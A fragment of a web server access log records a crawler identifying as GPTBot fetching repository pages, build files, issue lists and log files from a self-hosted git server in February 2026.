+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:16:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:16:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:16:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?state=open" [Client 74.7.227.38] [Length 8473] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?state=closed" -[17/Feb/2026:16:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10131] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:16:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11897] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11894] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg?display=source" [Client 74.7.227.38] [Length 14137] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:16:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:16:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:16:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11650] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" -[17/Feb/2026:16:36:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:36:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:16:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11768] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" -[17/Feb/2026:16:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11769] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" -[17/Feb/2026:16:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11739] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" -[17/Feb/2026:16:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11769] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" -[17/Feb/2026:16:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8515] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastissues&state=open" -[17/Feb/2026:16:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastcomplete&state=closed" -[17/Feb/2026:16:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:16:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8516] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostissues&state=open" -[17/Feb/2026:16:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastissues&state=open" [Client 74.7.227.38] [Length 8502] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastissues&state=closed" -[17/Feb/2026:16:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8512] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostcomplete&state=closed" -[17/Feb/2026:16:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostcomplete&state=all" [Client 74.7.227.38] [Length 8510] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostcomplete&state=open" -[17/Feb/2026:16:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastcomplete&state=all" [Client 74.7.227.38] [Length 8505] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastcomplete&state=open" -[17/Feb/2026:16:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9845] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9846] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9845] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9843] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:16:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:16:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9853] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9846] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastissues&state=open" [Client 74.7.227.38] [Length 8494] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastissues&state=closed" -[17/Feb/2026:16:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastissues&state=all" [Client 74.7.227.38] [Length 8492] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastissues&state=open" -[17/Feb/2026:16:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostcomplete&state=all" [Client 74.7.227.38] [Length 8503] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostcomplete&state=open" -[17/Feb/2026:16:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostissues&state=open" [Client 74.7.227.38] [Length 8496] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostissues&state=closed" -[17/Feb/2026:16:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibssl-3-x64.dll" [Client 74.7.227.38] [Length 23769] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:16:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11011] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html" [Client 74.7.227.38] [Length 106998] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:16:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:16:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpip" [Client 74.7.227.38] [Length 24083] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:16:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/package.json?display=source" [Client 74.7.227.38] [Length 11928] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" -[17/Feb/2026:16:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:16:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72033] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:16:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr 